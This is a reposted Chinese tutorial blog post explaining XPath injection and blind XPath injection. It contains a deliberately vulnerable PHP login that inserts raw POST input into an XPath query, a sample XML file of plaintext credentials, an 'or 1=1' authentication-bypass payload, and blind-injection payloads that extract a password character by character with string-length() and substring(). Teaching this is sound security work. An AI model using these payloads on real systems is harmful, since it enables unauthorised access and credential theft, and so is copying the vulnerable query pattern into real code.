0


xpath注入与盲注

xpath注入与盲注

XPath是一种查询语言,描述如何在XML文档中查找特定元素(包括属性、处理指令等),于SQL相似,Xpath可以引用XML文档的几乎任何部分,而不受访问控制限制。

XPath盲注可以从一个使用不安全方式嵌入用户信息的应用中提取数据,在输入未被过滤的情况下,攻击者可以提交并执行有效的XPath代码。这种攻击适用情况:攻击者不清楚XML文档的架构,或者错误消息被抑制,一次只能通过布尔化查询来获取部分信息,与SQL盲注相似。

测试

//xpath_user.xml

<?xml version="1.0" encoding="UTF-8"?><users><userid="1"username="admin"password="admin"></user><userid="2"username="root"password="admin"></user><userid="3"username="system"password="system"></user></users>
//xpath.php

<!DOCTYPE html>
<html>
        <head>
                <meta charset="UTF-8">
                <title></title>
        </head>
        <body>
                        <form method="POST">
                                用户名:<input type="text" name="username"><br>
                                密码:<input type="password" name="password"><br>
                                <input type="submit" value="登录" name="submit">
                        </form>
        </body>
</html>
<?php
if(file_exists('xpath_user.xml')){
        $xml=simplexml_load_file('xpath_user.xml');

        if($_POST['submit']){
                $username=$_POST['username'];
                $password=$_POST['password'];
                $sql="//user[@username='{$username}' and @password='{$password}']";
                $resulit = $xml->xpath($sql);
                if(count($resulit)==0){
                        echo '登录失败';
                }else{
                        echo "登录成功";
                }
        }
        }
?>

php件的用户登录使用的信息来自xml文件

$sql="//user[@username='{$username}' and @password='{$password}']";

select * from users where username='username' and password='password';
两个语句效果是相似的,实现的功能就是提取用户名和密码

方法

注入方法

万能密码: admin’ or ‘1’='1

x-www-from-urlencoded(raw): username=admin’ or ‘1’=‘1’ &password=xxxxxx&submit=submit

登陆成功

盲注方法

string-length()获取字符长度

substring 截取字符

注入语句(post data)

username=admin’and string-length(@password)=6 or ‘1’='1&password=0&submit=submit

获取长度,返回成功则表示长度正确

username=admin’and substring (@password,1,1)=‘a’ or ‘1’='1&password=0&submit=submit

尝试第一个字母是否为a,返回成功则表示字母正确,以此类推可以遍历出所有信息

标签: php 数据库 服务器

本文转载自: https://blog.csdn.net/RMC131/article/details/130251977
版权归原作者 RICKC131 所有, 如有侵权,请联系我们删除。

“xpath注入与盲注”的评论:

还没有评论